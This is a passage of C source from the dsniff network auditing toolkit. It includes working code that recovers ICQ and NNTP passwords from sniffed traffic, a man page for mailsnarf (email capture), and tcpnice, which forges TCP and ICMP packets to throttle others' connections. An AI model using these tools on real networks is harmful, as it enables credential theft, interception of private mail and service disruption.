return (0); } #define SZOF(a) (sizeof(a) / sizeof(a[0])) static void mdump(struct magic *m) { static char *typ[] = { "invalid", "byte", "short", "invalid", "long", "string", "date", "beshort", "belong", "bedate", "leshort", "lelong", "ledate" }; (void) fputc('[', stderr); (void) fprintf(stderr, ">>>>>>>> %d" + 8 - (m->cont_level & 7), m->offset); if (m->flag & INDIR) (void) fprintf(stderr, "(%s,%d),", (m->in.type >= 0 && m->in.type < SZOF(typ)) ? typ[(unsigned char) m->in.type] : "*bad*", m->in.offset); (void) fprintf(stderr, " %s%s", (m->flag & UNSIGNED) ? "u" : "", (m->type >= 0 && m->type < SZOF(typ)) ? typ[(unsigned char) m->type] : "*bad*"); if (m->mask != ~0) (void) fprintf(stderr, " & %.8x", m->mask); (void) fprintf(stderr, ",%c", m->reln); if (m->reln != 'x') { switch (m->type) { case BYTE: case SHORT: case LONG: case LESHORT: case LELONG: case BESHORT: case BELONG: (void) fprintf(stderr, "%d", m->value.l); break; case STRING: fprintf(stderr, "%s", m->value.s); break; case DATE: case LEDATE: case BEDATE: { char *rt, *pp = ctime((time_t*) &m->value.l); if ((rt = strchr(pp, '\n')) != NULL) *rt = '\0'; (void) fprintf(stderr, "%s,", pp); if (rt) *rt = '\n'; } break; default: (void) fputs("*bad*", stderr); break; } } (void) fprintf(stderr, ",\"%s\"]\n", m->desc); } static int magic_parse(char *p) { struct magic *m; char *t, *s; int i, j; if (Magiccnt + 1 > Magicmax) errx(1, "magic_parse: magic table full"); m = &Magic[Magiccnt]; m->flag = 0; m->cont_level = 0; while (*p == '>') { p++; /* step over */ m->cont_level++; } if (m->cont_level != 0 && *p == '(') { p++; /* step over */ m->flag |= INDIR; } if (m->cont_level != 0 && *p == '&') { p++; /* step over */ m->flag |= ADD; } /* Get offset, then skip over it. */ m->offset = (int) strtoul(p, &t, 0); if (p == t) errx(1, "magic_parse: offset %s invalid", p); p = t; if (m->flag & INDIR) { m->in.type = LONG; m->in.offset = 0; /* read [.lbs][+-]nnnnn) */ if (*p == '.') { p++; switch (LOWCASE(*p)) { case 'l': m->in.type = LONG; break; case 'h': case 's': m->in.type = SHORT; break; case 'c': case 'b': m->in.type = BYTE; break; default: errx(1, "magic_parse: indirect offset " "type '%c' invalid", *p); break; } p++; } s = p; if (*p == '+' || *p == '-') p++; if (isdigit((u_char) *p)) { m->in.offset = strtoul(p, &t, 0); if (*s == '-') m->in.offset = - m->in.offset; } else t = p; if (*t++ != ')') errx(1, "magic_parse: missing ')' in indirect offset"); p = t; } while (isascii((u_char) *p) && isdigit((u_char) *p)) p++; while (isascii((u_char) *p) && isspace((u_char) *p)) p++; if (*p == 'u') { p++; m->flag |= UNSIGNED; } /* Get type, skip it. */ t = p; for (i = 0; i < 12; i++) { j = strlen(Magictypes[i]); if (strncmp(p, Magictypes[i], j) == 0) { m->type = i + 1; p += j; break; } } if (p == t) errx(1, "magic_parse: type %s invalid", p); /* New-style and'ing: "0 byte&0x80 =0x80 dynamically linked" */ if (*p == '&') { p++; m->mask = signextend(m, strtoul(p, &p, 0)); eatsize(&p); } else m->mask = ~0L; while (isascii((u_char) *p) && isspace((u_char) *p)) p++; switch(*p) { case '>': case '<': /* Old-style and'ing: "0 byte &0x80 dynamically linked" */ case '&': case '^': case '=': m->reln = *p; p++; break; case '!': if (m->type != STRING) { m->reln = *p; p++; break; } /* FALLTHRU */ default: if (*p == 'x' && isascii((u_char) p[1]) && isspace((u_char) p[1])) { m->reln = *p; p++; goto parse_get_desc; /* Bill The Cat */ } m->reln = '='; break; } while (isascii((u_char) *p) && isspace((u_char) *p)) p++; if (getvalue(m, &p)) return (0); parse_get_desc: /* Now get last part - the description. */ while (isascii((u_char) *p) && isspace((u_char) *p)) p++; strlcpy(m->desc, p, sizeof(m->desc)); if ((*m->desc != '\0') && (getdecodebyname(m->desc) == NULL)) warnx("magic: unknown decode: '%s'", p); if (Opt_debug) { mdump(m); } Magiccnt++; return (1); } static int magic_init_file(char *filename) { FILE *f; char buf[BUFSIZ]; char *fn; fn = filename; if (fn == NULL) fn = DSNIFF_LIBDIR DSNIFF_MAGIC; if ((f = fopen(fn, "r")) == NULL) { if (filename == NULL) return 1; // Continue; errx(1, "magic_init %s", fn); } memset(&Magic, 0, sizeof(Magic)); while (fgets(buf, sizeof(buf), f) != NULL) { if (buf[0] == '#') continue; if (strlen(buf) <= 1) continue; buf[strlen(buf) - 1] = '\0'; magic_parse(buf); } fclose(f); } void magic_init(char *filename) { if (magic_init_file(filename) == 0) return; for (int i = 0; i < sizeof mgx / sizeof *mgx; i++) { if (strlen(mgx[i]) <= 1) continue; magic_parse(mgx[i]); } } /* Convert the byte order of the data we are looking at */ static int mconvert(union VALUETYPE *p, struct magic *m) { switch (m->type) { case BYTE: case SHORT: case LONG: case DATE: return (1); case STRING: { char *ptr; /* Null terminate and eat the return */ p->s[sizeof(p->s) - 1] = '\0'; if ((ptr = strchr(p->s, '\n')) != NULL) *ptr = '\0'; return (1); } case BESHORT: p->h = (short)((p->hs[0]<<8)|(p->hs[1])); return (1); case BELONG: case BEDATE: p->l = (int32_t)((p->hl[0]<<24)|(p->hl[1]<<16)| (p->hl[2]<<8)|(p->hl[3])); return (1); case LESHORT: p->h = (short)((p->hs[1]<<8)|(p->hs[0])); return (1); case LELONG: case LEDATE: p->l = (int32_t)((p->hl[3]<<24)|(p->hl[2]<<16)| (p->hl[1]<<8)|(p->hl[0])); return (1); default: errx(1, "mconvert: invalid type %d", m->type); } return (0); } static int mget(union VALUETYPE* p, u_char *s, struct magic *m, int nbytes) { int32_t offset = m->offset; if (offset + sizeof(union VALUETYPE) <= nbytes) memcpy(p, s + offset, sizeof(*p)); else { /* * the usefulness of padding with zeroes eludes me, it * might even cause problems */ int32_t have = nbytes - offset; memset(p, 0, sizeof(*p)); if (have > 0) memcpy(p, s + offset, have); } if (!mconvert(p, m)) return (0); if (m->flag & INDIR) { switch (m->in.type) { case BYTE: offset = p->b + m->in.offset; break; case SHORT: offset = p->h + m->in.offset; break; case LONG: offset = p->l + m->in.offset; break; } if (offset + sizeof(*p) > nbytes) return (0); memcpy(p, s + offset, sizeof(*p)); if (!mconvert(p, m)) return (0); } return (1); } static int mcheck(union VALUETYPE* p, struct magic *m) { register u_int32_t l = m->value.l; register u_int32_t v = 0; int matched; if ( (m->value.s[0] == 'x') && (m->value.s[1] == '\0') ) { warnx("mcheck: BOINK"); return (1); } switch (m->type) { case BYTE: v = p->b; break; case SHORT: case BESHORT: case LESHORT: v = p->h; break; case LONG: case BELONG: case LELONG: case DATE: case BEDATE: case LEDATE: v = p->l; break; case STRING: l = 0; /* What we want here is: * v = strncmp(m->value.s, p->s, m->vallen); * but ignoring any nulls. bcmp doesn't give -/+/0 * and isn't universally available anyway. */ v = 0; { register u_char *a = (u_char *) m->value.s; register u_char *b = (u_char *) p->s; register int len = m->vallen; while (--len >= 0) if ((v = *b++ - *a++) != '\0') break; } break; default: errx(1, "mcheck: invalid type %d", m->type); /* NOTREACHED */ } v = signextend(m, v) & m->mask; switch (m->reln) { case 'x': matched = 1; break; case '!': matched = v != l; break; case '=': matched = v == l; break; case '>': if (m->flag & UNSIGNED) { matched = v > l; } else matched = (int32_t) v > (int32_t) l; break; case '<': if (m->flag & UNSIGNED) { matched = v < l; } else matched = (int32_t) v < (int32_t) l; break; case '&': matched = (v & l) == l; break; case '^': matched = (v & l) != l; break; default: matched = 0; errx(1, "mcheck: can't happen: invalid relation %d", m->reln); /* NOTREACHED */ } if (matched && Opt_debug) mdump(m); return (matched); } static int32_t mprint(union VALUETYPE *p, struct magic *m) { int32_t t = 0; switch (m->type) { case BYTE: t = m->offset + sizeof(char); break; case SHORT: case BESHORT: case LESHORT: t = m->offset + sizeof(short); break; case LONG: case BELONG: case LELONG: t = m->offset + sizeof(int32_t); break; case STRING: if (m->reln == '=') { t = m->offset + strlen(m->value.s); } else { if (*m->value.s == '\0') { char *cp = strchr(p->s,'\n'); if (cp) *cp = '\0'; } t = m->offset + strlen(p->s); } break; case DATE: case BEDATE: case LEDATE: t = m->offset + sizeof(time_t); break; default: errx(1, "mprint: invalid m->type (%d)", m->type); } strncpy(Match, m->desc, sizeof(Match)); return (t); } /* * Go through the whole list, stopping if you find a match. Process all * the continuations of that match before returning. * * We support multi-level continuations: * * At any time when processing a successful top-level match, there is a * current continuation level; it represents the level of the last * successfully matched continuation. * * Continuations above that level are skipped as, if we see one, it * means that the continuation that controls them - i.e, the * lower-level continuation preceding them - failed to match. * * Continuations below that level are processed as, if we see one, * it means we've finished processing or skipping higher-level * continuations under the control of a successful or unsuccessful * lower-level continuation, and are now seeing the next lower-level * continuation and should process it. The current continuation * level reverts to the level of the one we're seeing. * * Continuations at the current level are processed as, if we see * one, there's no lower-level continuation that may have failed. * * If a continuation matches, we bump the current continuation level * so that higher-level continuations are processed. */ char * magic_match(u_char *s, int len) { int i, cont_level = 0; union VALUETYPE p; static int32_t *tmpoff = NULL; static size_t tmplen = 0; int32_t oldoff = 0; Match[0] = '\0'; if (tmpoff == NULL) if ((tmpoff = (int32_t *) malloc(tmplen = 20)) == NULL) err(1, "malloc"); for (i = 0; i < Magiccnt; i++) { /* if main entry matches, print it... */ if (!mget(&p, s, &Magic[i], len) || !mcheck(&p, &Magic[i])) { /* * main entry didn't match, * flush its continuations */ while (i < Magiccnt && Magic[i + 1].cont_level != 0) i++; continue; } tmpoff[cont_level] = mprint(&p, &Magic[i]); /* and any continuations that match */ if (++cont_level >= tmplen) { tmplen += 20; if (!(tmpoff = (int32_t *) realloc(tmpoff, tmplen))) err(1, "magic_match: malloc"); } while (Magic[i + 1].cont_level != 0 && ++i < Magiccnt) { if (cont_level >= Magic[i].cont_level) { if (cont_level > Magic[i].cont_level) { /* * We're at the end of the level * "cont_level" continuations. */ cont_level = Magic[i].cont_level; } if (Magic[i].flag & ADD) { oldoff = Magic[i].offset; Magic[i].offset += tmpoff[cont_level - 1]; } if (mget(&p, s, &Magic[i], len) && mcheck(&p, &Magic[i])) { /* This continuation matched. */ tmpoff[cont_level] = mprint(&p, &Magic[i]); /* * If we see any continuations * at a higher level, process them. */ if (++cont_level >= tmplen) { tmplen += 20; if (!(tmpoff = (int32_t *) realloc(tmpoff, tmplen))) err(1, "magic_check: " "malloc"); } } if (Magic[i].flag & ADD) { Magic[i].offset = oldoff; } } } return (strlen(Match) ? Match : NULL); /* all through */ } return (NULL); /* no match at all */ } hackerschoice-dsniff-a17510d/decode_icq.c0000664000175000017500000001034315105626144020236 0ustar epsilonepsilon/* * decode_icq.c * * ICQ (note - ICQ2000 is actually AIM). * * Copyright (c) 2000 Dug Song * * $Id: decode_icq.c,v 1.7 2001/03/15 08:33:00 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" #define ICQ2_UIN_OFFSET 6 #define ICQ2_CMD_OFFSET 2 #define ICQ2_PASS_OFFSET 16 #define ICQ5_UIN_OFFSET 6 #define ICQ5_CMD_OFFSET 14 #define ICQ5_CKSUM_OFFSET 20 #define ICQ5_PASS_OFFSET 34 const u_char icq5_table [] = { 0x59, 0x60, 0x37, 0x6B, 0x65, 0x62, 0x46, 0x48, 0x53, 0x61, 0x4C, 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x5E, 0x34, 0x6D, 0x36, 0x50, 0x3F, 0x6F, 0x67, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x47, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x31, 0x64, 0x35, 0x5A, 0x4A, 0x42, 0x56, 0x40, 0x67, 0x53, 0x41, 0x07, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x43, 0x69, 0x48, 0x33, 0x31, 0x44, 0x65, 0x62, 0x46, 0x48, 0x53, 0x41, 0x07, 0x6C, 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x4E, 0x6C, 0x49, 0x38, 0x4B, 0x55, 0x4A, 0x62, 0x46, 0x48, 0x33, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x63, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x35, 0x5A, 0x6A, 0x52, 0x6E, 0x3C, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, 0x3F, 0x4F, 0x37, 0x4B, 0x35, 0x5A, 0x4A, 0x62, 0x66, 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x5B, 0x5D, 0x4E, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x3B, 0x4D, 0x46, 0x48, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x55, 0x6A, 0x32, 0x3E, 0x44, 0x45, 0x52, 0x6E, 0x3C, 0x31, 0x64, 0x55, 0x6A, 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x4C, 0x39, 0x30, 0x6F, 0x47, 0x63, 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x3E, 0x64, 0x35, 0x3A, 0x3A, 0x5A, 0x6A, 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x67, 0x53, 0x41, 0x25, 0x41, 0x3C, 0x51, 0x54, 0x3D, 0x5E, 0x54, 0x5D, 0x4E, 0x4C, 0x39, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x6E, 0x3C, 0x31, 0x64, 0x35, 0x5A, 0x00, 0x00 }; int decode_icq(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_short version, cmd; u_int32_t uin; u_char *p; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_get(&inbuf, &version, sizeof(version)) != sizeof(version)) return (0); version = pletohs(&version); switch (version) { case 2: if (buf_seek(&inbuf, ICQ2_CMD_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &cmd, sizeof(cmd)) != sizeof(cmd)) return (0); if ((cmd = pletohs(&cmd)) != 1000) return (0); if (buf_seek(&inbuf, ICQ2_UIN_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &uin, sizeof(uin)) != sizeof(uin)) return (0); uin = pletohl(&uin); if (buf_seek(&inbuf, ICQ2_PASS_OFFSET, SEEK_SET) < 0) return (0); break; case 5: { u_int32_t a1, a2, a3, a4, a5, c, key, i, k; if (buf_seek(&inbuf, ICQ5_CKSUM_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &c, sizeof(c)) != sizeof(c)) return (0); c = pletohl(&c); a1 = c & 0x0001f000; a1 = a1 >> 0x0c; a2 = c & 0x07c007c0; a2 = a2 >> 0x01; a3 = c & 0x003e0001; a3 = a3 << 0x0a; a4 = c & 0xf8000000; a4 = a4 >> 0x10; a5 = c & 0x0000083e; a5 = a5 << 0x0f; key = len * 0x68656C6C; key += a1 + a2 + a3 + a4 + a5; p = inbuf.base; for (i = 0x0a; i < inbuf.end + 3; i += 4) { k = key + icq5_table[i & 0xff]; if (i != 0x16) { p[i] ^= (u_char)(k & 0xff); p[i + 1] ^= (u_char)((k & 0xff00) >> 8); } if (i != 0x12) { p[i + 2] ^= (u_char)((k & 0xff0000) >> 16); p[i + 3] ^= (u_char)((k & 0xff000000) >> 24); } } if (buf_seek(&inbuf, ICQ5_CMD_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &cmd, sizeof(cmd)) != sizeof(cmd)) return (0); if ((cmd = pletohs(&cmd)) != 1000) return (0); if (buf_seek(&inbuf, ICQ5_UIN_OFFSET, SEEK_SET) < 0) return (0); if (buf_get(&inbuf, &uin, sizeof(uin)) != sizeof(uin)) return (0); uin = pletohl(&uin); if (buf_seek(&inbuf, ICQ5_PASS_OFFSET, SEEK_SET) < 0) return (0); } break; default: return (0); } buf_putf(&outbuf, "%d\n%.*s\n", uin, buf_len(&inbuf), buf_ptr(&inbuf)); buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/decode_ssh.c0000664000175000017500000000105415105626144020256 0ustar epsilonepsilon#include "config.h" #include #include #include #include #include #include #include "options.h" #include "decode.h" extern struct _dc_meta dc_meta; int decode_ssh(u_char *buf, int len, u_char *obuf, int olen) { u_char *ptr = ""; if (!Opt_verbose) return 0; if (strncmp(buf, "SSH-", 4) != 0) return 0; if (dc_meta.rbuf != NULL) ptr = ascii_string(dc_meta.rbuf, dc_meta.rlen); snprintf(obuf, olen, "%s >>> %s", ascii_string(buf, len), ptr); return (strlen(obuf)); } hackerschoice-dsniff-a17510d/decode_hex.c0000664000175000017500000000226615105626144020253 0ustar epsilonepsilon/* * decode_hex.c * * Hex dump, for debugging. * * Copyright (c) 2000 Dug Song * * $Id: decode_hex.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "buf.h" #include "decode.h" /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ int decode_hex(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_int i, j, k; u_char c; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); while ((i = buf_len(&inbuf)) > 0) { i = i < 16 ? i : 16; k = buf_tell(&inbuf); buf_putf(&outbuf, " %04x: ", k); for (j = 0; j < i; j++) { buf_get(&inbuf, &c, 1); buf_putf(&outbuf, "%02x", (u_int)c); if ((j % 2) == 1) buf_put(&outbuf, " ", 1); } for (; j < 16; j++) { buf_put(&outbuf, " ", (j % 2) + 2); } buf_put(&outbuf, " ", 1); buf_seek(&inbuf, k, SEEK_SET); for (j = 0; j < i; j++) { buf_get(&inbuf, &c, 1); c = isprint(c) ? c : '.'; buf_putf(&outbuf, "%c", c); } buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/pathnames.h0000664000175000017500000000060215105626144020141 0ustar epsilonepsilon/* * pathnames.h * * dsniff pathnames. * * Copyright (c) 2000 Dug Song * * $Id: pathnames.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef PATHNAMES_H #define PATHNAMES_H #ifndef DSNIFF_LIBDIR #define DSNIFF_LIBDIR "/usr/share/dsniff/" #endif #define DSNIFF_SERVICES "dsniff.services" #define DSNIFF_MAGIC "dsniff.magic" #endif /* PATHNAMES_H */ hackerschoice-dsniff-a17510d/common.h0000664000175000017500000000022715105626144017454 0ustar epsilonepsilon #include "config.h" #ifndef MAX # define MAX(X, Y) (((X) < (Y)) ? (Y) : (X)) #endif #ifndef MIN # define MIN(X, Y) (((X) < (Y)) ? (X) : (Y)) #endif hackerschoice-dsniff-a17510d/mailsnarf.80000664000175000017500000000170315105626144020060 0ustar epsilonepsilon.TH MAILSNARF 8 .ad .fi .SH NAME mailsnarf \- sniff mail messages in Berkeley mbox format .SH SYNOPSIS .na .nf .fi \fBmailsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBmailsnarf\fR outputs e-mail messages sniffed from SMTP and POP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader (mail(1), pine(1), etc.). .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-p \fIpcapfile\fR" Process packets from the specified PCAP capture file instead of the network. .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching messages. .IP \fIpattern\fR Specify regular expression for message header/body matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8), mail(1), pine(1) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/tcpnice.c0000664000175000017500000001164315105626144017610 0ustar epsilonepsilon/* * tcpnice.c * * Slow down TCP connections already in progress. * * Copyright (c) 2000 Dug Song * * $Id: tcpnice.c,v 1.17 2001/03/17 07:41:51 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "pcaputil.h" #define MIN_WIN 1 /* XXX */ #define MIN_MTU 68 /* RFC 1191 */ static int Opt_icmp; static int Opt_pmtu; static int Opt_win; static int pcap_off; static u_char buf[BUFSIZ]; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: tcpnice [-A] [-I] [-M] [-i interface] expression\n"); exit(1); } static void send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip, struct libnet_tcp_hdr *tcp) { int len; ip->ip_hl = 5; ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H); ip->ip_id = libnet_get_prand(LIBNET_PRu16); memcpy(buf, (u_char *)ip, LIBNET_IPV4_H); tcp->th_off = 5; tcp->th_win = htons(MIN_WIN); memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H); libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H); len = LIBNET_IPV4_H + LIBNET_TCP_H; if (libnet_write_raw_ipv4(l, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n", libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), 1); } static void send_icmp_source_quench(libnet_t *l, struct libnet_ipv4_hdr *ip) { struct libnet_icmpv4_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H); icmp->icmp_type = ICMP_SOURCEQUENCH; icmp->icmp_code = 0; memcpy((u_char *)icmp + LIBNET_ICMPV4_ECHO_H, (u_char *)ip, len); len += LIBNET_ICMPV4_ECHO_H; libnet_build_ipv4(LIBNET_IPV4_H + len, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, (u_int8_t *) icmp, len, l, 0); if (libnet_write(l) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: source quench\n", libnet_addr2name4(ip->ip_dst.s_addr, 0), libnet_addr2name4(ip->ip_src.s_addr, 0)); } static void send_icmp_frag_needed(libnet_t *l, struct libnet_ipv4_hdr *ip) { struct libnet_icmpv4_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H); icmp->icmp_type = ICMP_UNREACH; icmp->icmp_code = ICMP_UNREACH_NEEDFRAG; icmp->hun.frag.pad = 0; icmp->hun.frag.mtu = htons(MIN_MTU); memcpy((u_char *)icmp + LIBNET_ICMPV4_MASK_H, (u_char *)ip, len); len += LIBNET_ICMPV4_MASK_H; libnet_build_ipv4(LIBNET_IPV4_H + len, 4, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP, 0, ip->ip_dst.s_addr, ip->ip_src.s_addr, (u_int8_t *) icmp, len, l, 0); if (libnet_write(l) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: ", libnet_addr2name4(ip->ip_dst.s_addr, 0), libnet_addr2name4(ip->ip_src.s_addr, 0)); fprintf(stderr, "%s unreachable - need to frag (mtu %d)\n", libnet_addr2name4(ip->ip_src.s_addr, 0), MIN_MTU); } static void tcp_nice_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) { struct libnet_ipv4_hdr *ip; struct libnet_tcp_hdr *tcp; int len; libnet_t *l; l = (libnet_t *)user; pkt += pcap_off; len = pcap->caplen - pcap_off; ip = (struct libnet_ipv4_hdr *)pkt; if (ip->ip_p != IPPROTO_TCP) return; tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) return; if (ntohs(ip->ip_len) > (ip->ip_hl << 2) + (tcp->th_off << 2)) { if (Opt_icmp) send_icmp_source_quench(l, ip); if (Opt_win) send_tcp_window_advertisement(l, ip, tcp); if (Opt_pmtu) send_icmp_frag_needed(l, ip); } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; char *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; pcap_t *pd; intf = NULL; while ((c = getopt(argc, argv, "i:AIMh?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case 'A': Opt_win = 1; break; case 'I': Opt_icmp = 1; break; case 'M': Opt_pmtu = 1; break; default: usage(); break; } } if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); argc -= optind; argv += optind; if (argc == 0) usage(); if ((Opt_win | Opt_icmp | Opt_pmtu) == 0) Opt_win = Opt_icmp = Opt_pmtu = 1; filter = copy_argv(argv); if ((pd = pcap_init_dsniff(intf, filter, 128)) == NULL) errx(1, "couldn't initialize sniffing"); if ((pcap_off = pcap_dloff(pd)) < 0) errx(1, "couldn't determine link layer offset"); if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL) errx(1, "couldn't initialize sending"); libnet_seed_prand(l); warnx("listening on %s [%s]", intf, filter); pcap_loop(pd, -1, tcp_nice_cb, (u_char *)l); /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/decode_nntp.c0000664000175000017500000000230015105626144020433 0ustar epsilonepsilon/* * decode_nntp.c * * Network News Transport Protocol. * * Copyright (c) 2000 Felix von Leitner * Copyright (c) 2000 Dug Song * * $Id: decode_nntp.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "base64.h" #include "decode.h" int decode_nntp(u_char *buf, int len, u_char *obuf, int olen) { char *p; int i, simple, dpa; obuf[0] = '\0'; simple = dpa = 0; for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { if (simple == 1) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); simple = 0; } else if (strncasecmp(p, "AUTHINFO ", 9) == 0) { strlcat(obuf, p, olen); if (strncasecmp(p + 9, "SIMPLE", 6) == 0) { simple = 1; } else if (strncasecmp(p + 9, "GENERIC ", 8) == 0) { if (strncasecmp(p + 17, "DPA", 3) == 0) { dpa = 1; } else if (dpa == 1) { p += 17; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; i = strlen(obuf); snprintf(obuf + i, olen - i, " [%s]", p); } } strlcat(obuf, "\n", olen); } } return (strlen(obuf)); } hackerschoice-dsniff-a17510d/asn1.c0000664000175000017500000000146715105626144017030 0ustar epsilonepsilon/* * asn1.c * * Copyright (c) 2000 Dug Song * * $Id: asn1.c,v 1.4 2001/03/15 08:32:58 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "asn1.h" int asn1_type(buf_t buf) { u_char c; if (buf_get(buf, &c, 1) != 1) return (-1); return (c & 0x1f); } int asn1_len(buf_t buf) { u_char *p, c; int num; if (buf_get(buf, &c, 1) != 1) return (-1); if (c >= 128) { c &= ~128; p = buf_ptr(buf); if (buf_skip(buf, c) < 0) return (-1); switch (c) { case 1: num = *p; break; case 2: GETSHORT(num, p); break; case 3: p--; GETLONG(num, p); num &= 0xfff; break; case 4: GETLONG(num, p); break; default: return (-1); } } else num = c; return (num); } hackerschoice-dsniff-a17510d/crc32.c0000664000175000017500000000723615105626144017102 0ustar epsilonepsilon #include #include "crc32.h" /* * Table of CRCs of all 8-bit messages. */ static const uint32_t CRC32_Table[256] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 